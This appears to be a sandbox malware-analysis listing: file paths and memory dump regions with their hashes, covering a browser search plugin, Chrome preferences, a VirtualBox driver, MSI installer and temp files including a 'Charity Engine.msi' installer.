SHA256 1d4ee950fbdb453ca475409595b36218f13b89355c117ab57c6f642c3d0b2d86
SHA512 c6e932a4ae8e8619a7b6d7c9ce0259df410fadb0d968795919a95d070193904c20e6790360749160448c35bee4484e642836092b45fe43eefbebc781c7a5a6f0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\41eh5pdr.default-release\searchplugins\cdnsearch.xml

MD5 2869f887319d49175ff94ec01e707508
SHA1 e9504ad5c1bcf31a2842ca2281fe993d220af4b8
SHA256 49dd61e19d4541f1e695b66847d0bf99bc08952ba41b33a69c2e297dfa282d15
SHA512 63673c1ede47fda14dea78483c6319132a849db3b35953e43704aa49cfb6d14e42d74e0eaf93f4cdb7632c85f368d484ac111687127d2b87a3e264949085c76b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 50fb1953ddd3e0537bae520d20e8fd26
SHA1 00e8bf05449ae881953a7573ecbcfad45d2745be
SHA256 204be4f706b94a8ba8a6191e82509d9cde0b1ef7c4150d055188744ffbe3711f
SHA512 63931ad864d060ca9b0089bc09c6373ee8347d2eda9f34d4cf97ab5f0cfa9f1020c69bfc3d7332030ea2ad2a94ccae5fb5b4c729fb1dec4d2c3a1508b4f42963

memory/5292-1679-0x0000000001310000-0x0000000001984000-memory.dmp

C:\Windows\System32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.sys

MD5 321ccdb9223b0801846b9ad131ac4d81
SHA1 ac8fb0fc82a8c30b57962fe5d869fda534053404
SHA256 05045c57480d3d5996e10a60393e799647c4ddaf6ede5f712d520c2a2841d43b
SHA512 75b5cfd1dfe7da31f8988e2e76ca4ad21784acf9fc26a2593e567eb7e54036026c5249695614f8f1b53873fa9bf82e864b609d2f863717b8363189de7284754a

C:\Windows\Installer\e5b5f05.msi

MD5 a198248d82bcfe0548af2dd8b5d234c9
SHA1 b48db4ee1171682510b7f9768a119da78937f0bd
SHA256 5e4fd3d3aa4666014213cd384da90d59bcd77bc7ae7fedcb6951e9c4945fc0fb
SHA512 ebff424004dccf67613e3caa5a04d6865f581125cec31539d86d9bc89e89a0571f979c1a877d651bbcb63aa4cc1c6569cc6af64d69dd0a9b0ddde28b0e24d878

C:\Windows\Installer\MSI2B53.tmp

MD5 4298cfa3dab9867af517722fe69b1333
SHA1 ab4809f8c9282e599aa64a8ca9900b09b98e0425
SHA256 cedff33eba97e81df4248a087441b1cd9877fa63aded5d357f601302ae6d9cf8
SHA512 37b6830886e210c9ca20cc6699f50389937edc2e558165d0e8aa3786e7dd971096bbf6c0f3e36aa8ddd7433e02155de04e23b929e5e846f8fe5586b08a596d3b

C:\Config.Msi\e5b5f08.rbs

MD5 45dfd0aeba234fcdf2e3604f3e684c10
SHA1 13d3d1465d28a1dc838f58372fdae780b3963679
SHA256 8cc51b19efda9eb8a8a01f45de68602377b50881ee2d1561e38ae679154e4d7a
SHA512 adf0c7cec8d60d761e96c0690d475573f06d5080a4faef5a1d30fa70b31b235fabc6d142c1428c746e1be086d3d3bf4c1eebd08370638f3e5e911803f27362f0

C:\Users\Admin\AppData\Local\Temp\_is339F.tmp

MD5 9bcd3291daba5a496ef2d8b5bd084641
SHA1 2d21278f834244edd85ffdd14b70beed842d253b
SHA256 68d3b84ffdb232331de3571ca1adfcef53a0b921cba6fe1e6960eb7144b2b639
SHA512 d8375d3d0ebec313824dacb0b2214dc0a9ed8edbca095fd219f07bc960707c1e6b53d46ad8d7951a6c2c769179bd58a4c50a8d5f266d992b4507917bfc1a7f49

C:\Users\Admin\AppData\Local\Temp\{AD501DD3-9C00-4520-BB7B-5B595ACB435A}\0x0409.ini

MD5 be345d0260ae12c5f2f337b17e07c217
SHA1 0976ba0982fe34f1c35a0974f6178e15c238ed7b
SHA256 e994689a13b9448c074f9b471edeec9b524890a0d82925e98ab90b658016d8f3
SHA512 77040dbee29be6b136a83b9e444d8b4f71ff739f7157e451778fb4fccb939a67ff881a70483de16bcb6ae1fea64a89e00711a33ec26f4d3eea8e16c9e9553eff

C:\Users\Admin\AppData\Local\Temp\~338D.tmp

MD5 b2403c034d0c2c07070ba6b062c48533
SHA1 93e3c85774ec538076dbb8a3861a7b5528e51b43
SHA256 4a2d804078cc2018e07ce42591cc5fbf0885208fcbf936083251335cb60d27a4
SHA512 a268a5a4e49c60b6c8ca2052f8f1915aff84d48b1fbb96f744848abbf75c109a730b1a77541c48fc31c201ac431055bcd7ae3477ba03adb40d69aa5e01c0d0fa

memory/60-1982-0x0000000000D80000-0x0000000001246000-memory.dmp

C:\Windows\Downloaded Installations\{97657C9B-F62F-4B80-92E3-C146A666778F}\Charity Engine.msi

MD5 cbe108ce6937195b2c099dcc66263f3e
SHA1 0c317ad78069d6d20534d45162e5164f193bbd72
SHA256 62004d99aef328d0cd276b752fb6d6cf4a2db9c3cd6d11ae8ec4bf81b72ab1a2
SHA512 d4685c4a63aded1f594d9e9014095161d61822893f3a589a7943f43c2c196be645772bc5a4e6b7dd579c72ad036c2e557e65cdccd42d62c855736f97bec8e7de

C:\Users\Admin\AppData\Local\Temp\{AD501DD3-9C00-4520-BB7B-5B595ACB435A}\_ISMSIDEL.INI

MD5 db9af7503f195df96593ac42d5519075
SHA1 1b487531bad10f77750b8a50aca48593379e5f56
SHA256 0a33c5dffabcf31a1f6802026e9e2eef4b285e57fd79d52fdcd98d6502d14b13
SHA512 6839264e14576fe190260a4b82afc11c88e50593a20113483851bf4abfdb7cca9986bef83f4c6b8f98ef4d426f07024cf869e8ab393df6d2b743b9b8e2544e1b